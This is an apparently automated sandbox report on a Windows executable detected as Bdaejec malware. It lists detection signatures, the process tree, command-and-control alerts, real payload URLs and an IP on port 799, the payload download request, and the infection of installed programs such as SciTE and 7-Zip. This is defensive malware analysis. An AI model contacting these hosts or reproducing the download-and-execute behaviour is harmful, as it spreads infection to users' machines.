Edit tour

Windows Analysis Report
1hdqYXYJkr.exe

Overview

General Information

Sample name:	1hdqYXYJkr.exe renamed because original name is a hash value
Original sample name:	08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5.exe
Analysis ID:	1488690
MD5:	ac5a278467c279e653f34a552dd7170c
SHA1:	1a13f3fb4b8c19478204e19126dbd8d2f81cfdbe
SHA256:	08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5
Tags:	exe
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

1hdqYXYJkr.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\1hdqYXYJkr.exe" MD5: AC5A278467C279E653F34A552DD7170C)

conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

oQmD.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\oQmD.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 3604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 4916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: oQmD.exe PID: 6316	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-06T12:33:52.850053+0200
SID:	2838522
Source Port:	65342
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-06T12:33:53.346605+0200
SID:	2807908
Source Port:	49730
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1hdqYXYJkr.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.raration	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rartS	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar$=	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarf=Q	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.raro	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rart	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarI	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rari	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/amData	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarAppData	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 12%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rartS	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.raro	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.raration	Virustotal: Detection: 15%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rart	Virustotal: Detection: 10%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarI	Virustotal: Detection: 9%	Perma Link
Source: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll	Virustotal: Detection: 14%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rari	Virustotal: Detection: 11%	Perma Link
Source: http://ddos.dnsnb8.net/amData	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Virustotal: Detection: 93%			Perma Link

Multi AV Scanner detection for submitted file

Source: 1hdqYXYJkr.exe	Virustotal: Detection: 85%			Perma Link
Source: 1hdqYXYJkr.exe	ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1hdqYXYJkr.exe

Joe Sandbox ML: detected

Source: 1hdqYXYJkr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1hdqYXYJkr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_009685E9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_009685E9
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_008029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		2_2_008029E2

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_00802B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00802B8C

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_00801099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00801099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: oQmD.exe, 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmp, oQmD.exe, 00000002.00000003.1632073114.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/amData
Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000003.1638844737.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rari
Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rartS
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar$=
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarAppData
Source: oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarI
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raration
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarf=Q
Source: oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raro
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rart
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.c
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_f40c947f-a

System Summary

PE file contains section with special chars

Source: 1hdqYXYJkr.exe	Static PE information: section name: k)u
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: oQmD.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00A02B71	0_2_00A02B71
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_009677CA	0_2_009677CA
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_00806076	2_2_00806076
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_00806D00	2_2_00806D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\oQmD.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: String function: 00958FD0 appears 49 times

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: 1hdqYXYJkr.exe, 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe
Source: 1hdqYXYJkr.exe, 00000000.00000000.1630493730.000000000097B000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe
Source: 1hdqYXYJkr.exe	Binary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe

Source: 1hdqYXYJkr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: oQmD.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: oQmD.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: oQmD.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@7/15@1/1

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_0080119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_0080119F

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6316

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

File created: C:\Users\user\AppData\Local\Temp\oQmD.exe

Jump to behavior

Source: 1hdqYXYJkr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1hdqYXYJkr.exe	Virustotal: Detection: 85%
Source: 1hdqYXYJkr.exe	ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\1hdqYXYJkr.exe "C:\Users\user\Desktop\1hdqYXYJkr.exe"
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Process created: C:\Users\user\AppData\Local\Temp\oQmD.exe C:\Users\user\AppData\Local\Temp\oQmD.exe
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Process created: C:\Users\user\AppData\Local\Temp\oQmD.exe C:\Users\user\AppData\Local\Temp\oQmD.exe	Jump to behavior

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 1hdqYXYJkr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 1hdqYXYJkr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Unpacked PE file: 2.2.oQmD.exe.800000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: k)u

Source: 1hdqYXYJkr.exe	Static PE information: section name: k)u
Source: oQmD.exe.0.dr	Static PE information: section name: .aspack
Source: oQmD.exe.0.dr	Static PE information: section name: .adata
Source: SciTE.exe.2.dr	Static PE information: section name: u
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00A01E85 push 00000000h; ret	0_2_00A02296
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00A01E7B push ebp; ret	0_2_00A01E7E
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_0095879F push ecx; ret	0_2_009587B2
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_00801638 push dword ptr [00803084h]; ret	2_2_0080170E
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_0080600A push ebp; ret	2_2_0080600D
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_00806014 push 008014E1h; ret	2_2_00806425
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_00802D9B push ecx; ret	2_2_00802DAB

Source: oQmD.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.934227743946339
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.933439370372331
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934671817706898

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	File created: C:\Users\user\AppData\Local\Temp\oQmD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
